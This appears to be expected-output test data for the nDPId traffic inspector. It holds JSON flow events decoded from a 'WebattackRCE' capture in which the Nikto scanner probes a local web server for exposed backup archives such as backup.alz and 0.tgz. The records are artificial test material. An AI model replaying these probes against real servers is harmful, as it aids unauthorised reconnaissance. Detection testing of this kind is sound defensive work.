+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 